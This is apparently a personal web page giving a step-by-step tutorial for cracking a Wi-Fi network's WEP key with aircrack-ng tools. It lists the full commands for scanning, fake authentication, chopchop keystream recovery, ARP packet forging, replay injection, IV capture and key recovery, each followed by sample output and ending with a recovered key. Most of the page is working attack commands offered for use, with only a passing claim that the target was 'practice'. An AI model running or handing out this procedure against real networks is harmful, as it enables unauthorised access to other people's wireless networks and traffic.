How to crack
Interface Chipset Driver
rausb0 Ralink rt73
eth1 Centrino ipw2200
We are going to use rausb0 device!
2.
airodump-ng rausb0
response to this is
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:72:6B:69:0D:40 99 5 0 0 11 54 WEP WEP Grab
02:30:B4:65:3D:00 101 8 0 0 7 54. OPN PLOHL
BSSID STATION PWR Rate Lost Packets Probes
3.
In my example i have used the following target as practice:
BSSID = 00:72:6B:69:0D:40
Channel = 11
ESSID = Grab
determine the mac address of my ASUS USB WL-167g adapter
type
macchanger -s rausb0
response
mac address rausb0 48:5b:39:34:71:39
MY MAC = 48:5b:39:34:71:39
4.
Assocciate rausb0 to channel 11 with command
airmon-ng start rausb0 11
5.
I presumed that NO CLIENTS are attached to the WIFI. So associate with the TARGET WIFI by typing
aireplay-ng -1 9000 -o 1 -q 10 -a 00:72:6B:69:0D:40 rausb0
The response should say that
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
6.
Open new TERMINAL window!
Now try to break into the WiFi by issuing the following command:
aireplay-ng -4 -b 00:72:6B:69:0D:40 -c FF:FF:FF:FF:FF:FF -h 48:5b:39:34:71:39 -p 0841 rausb0
The correct response should be:
You issue command 'y' = yes
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
Saving chosen packet in replay_src-0201-191639.cap
Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
Offset 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 456ms
Offset 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 87ms
Offset 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 454ms
Offset 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 71ms
Offset 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 387ms
Offset 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 108ms
Offset 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 117ms
Offset 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 438ms
Offset 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 249ms
Offset 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 129ms
Offset 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 294ms
Offset 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 387ms
Offset 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 744ms
Offset 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 315ms
Offset 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 303ms
Offset 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 474ms
Offset 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in 591ms
Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms
Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms
Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms
Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms
Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms
Offset 58 (51% done) | xor = 25 | pt = 00 | 184 frames written in 552ms
Offset 57 (53% done) | xor = 94 | pt = 00 | 33 frames written in 99ms
Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms
Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms
Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms
Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms
Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms
Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms
Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms
Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms
Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms
Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms
Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms
Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms
Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms
Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms
Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms
Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms
Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms
Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor
Completed in 21s (2.29 bytes/s)
I have used several packets for one to succseed.
Eventualy it shall create and save XOR file:
replay_dec-0201-191706.xor
7.
Now we have a packet XOR and can create a arp replay packet, that shall be used
for INJECTION!
Use the command
packetforge-ng -0 -a 00:72:6B:69:0D:40 -h 48:5b:39:34:71:39 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0201-191706.xor -w arp-request
The response should say that
the packet arp-request is created
8.
Now attack the target wifi by issuing the following command:
aireplay-ng -2 -r arp-request rausb0
The response should be:
Saving chosen packet in arp-request
You should also start airodump-ng to capture replies.
Sent 4772 packets... (500 pps)
9.
Open new terminal window and use it to capture of the IV's
Use the command:
airodump-ng -w myfile --bssid 00:72:6B:69:0D:40 --channel 11 --ivs rausb0
The response should be:
And the number under #DATA should be increasing rapidly.
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:72:6B:69:0D:40 99 5 123 22 11 54 WEP WEP Grab
BSSID STATION PWR Rate Lost Packets Probes
10.
Open another window and run the CRACK
Issue the command:
aircrack-ng -z myfile*.ivs
The response should be:
[00:00:00] Tested 29 keys (got 78617 IVs)
KB depth byte(vote)
0 0/ 1 12(41472) F1(36864) 54(35840) 95(34816) 1D(34560) F0(34560) 75(34048) C1(33792)
1 0/ 1 34(40704) FB(35328) E6(34816) 23(34560) F5(34304) 1C(33792) 85(33792) 8E(33792)
2 0/ 3 56(39168) 07(37376) AC(35840) 0C(35328) DA(35328) 94(35072) 14(34816) 8D(34048)
3 0/ 1 78(40960) 42(36352) 19(35584) A0(35328) 11(34560) 17(34304) 2C(34304) 7C(34304)
4 4/ 10 75(34304) D1(34048) 2B(33792) 60(33792) 81(33792) A9(33792) 40(33536) 73(33536)
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
Back to WEP Crack page
Back to main page
Email me